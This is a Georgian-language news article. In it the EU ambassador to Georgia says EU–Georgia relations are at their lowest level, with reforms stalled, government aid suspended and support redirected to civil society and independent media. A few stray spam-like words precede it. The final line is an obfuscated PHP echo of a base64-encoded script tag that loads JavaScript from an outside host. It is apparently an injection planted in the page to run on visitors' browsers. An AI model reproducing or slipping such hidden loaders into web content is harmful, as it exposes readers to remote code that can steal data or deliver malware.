tube
ავერსი jaluzi

ჩემი, როგორც ევროკავშირის ელჩის როლია, საზოგადოებას წარვუდგინო ევროკავშირის პოზიცია, საქართველო-ევროკავშირის ურთიერთობები ყველაზე დაბალ დონეზეა, – ამის შესახებ საქართველოში ევროკავშირის ელჩმა, პაველ ჰერჩინსკიმ განაცხადა.

მისივე თქმით, რეფორმები არ ხორციელდება და გადადგმულია ნაბიჯები, რომლებიც საქართველოს ევროკავშირს აშორებს.

„ჩემი როლი არ არის სხვების განცხადებებზე კომენტირება. ჩემი, როგორც ევროკავშირის ელჩის როლი არის ევროკავშირის პოზიციის წარმოდგენა. ეს არის ის, რასაც ვაკეთებდი ჩემი ჩამოსვლის პირველი დღიდან და ეს არის ის, რასაც ვაკეთებ. რა თქმა უნდა, მსურს, შევაქო ხელისუფლება რეფორმებისთვის. მსურს ვთქვა პოზიტიური რამ საქართველოში განვითარების შესახებ, მაგრამ საქმე როდესაც ეხება ევროკავშირ-საქართველოს ურთიერთობებს, ჩვენ ამჟამად ყველაზე დაბალ დონეზე ვიმყოფებით. მაღალი დონის ვიზიტები არ არის. ჩვენ შევაჩერეთ ფინანსური დახმარება მთავრობისთვის. შემოვიღეთ სავიზო შეზღუდვები დიპლომატიური პასპორტების მფლობელებისთვის და მხარდაჭერას მთავრობის დახმარებიდან გადავამისამართებთ სამოქალაქო საზოგადოებისა და დამოუკიდებელი მედიის მხარდასაჭერად, რომლებსაც, სხვათა შორის, სულ უფრო რთულ პირობებში უწევთ მუშაობა.

ჩემი როლი, როგორც ევროკავშირის ელჩის, არის საზოგადოებისთვის წარმოდგენა, თუ რა მდგომარეობაშია ურთიერთობა ევროკავშირსა და საქართველოს შორის. როგორც ევროკავშირის ელჩს, რა თქმა უნდა, მსურს, სხვა მდგომარეობაში ვიყოთ. თუმცა, სამწუხაროდ, როგორც ყველამ ვიცით, ვითარება ამჟამად უკიდურესად რთულია. როგორც ევროკავშირმა, ჩვენ გადავწყვიტეთ 2023 წლის დეკემბერში გავუღეთ კარი საქართველოს, იმ პირობით, რომ რეფორმები განხორციელდება. როგორც ვხედავთ, ამ რეფორმების უმეტესობა არ ხორციელდება. პირიქით, გადადგმულია ნაბიჯები, რომლებიც საქართველოს არ აახლოებს ევროკავშირთან, არამედ კიდევ უფრო აშორებს. ეს, რა თქმა უნდა, ძალიან სამწუხაროა, მაგრამ ეს არის ამჟამინდელი მდგომარეობა საქართველოსთან მიმართებით“, – განაცხადა ჰერჩინსკიმ.

43
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");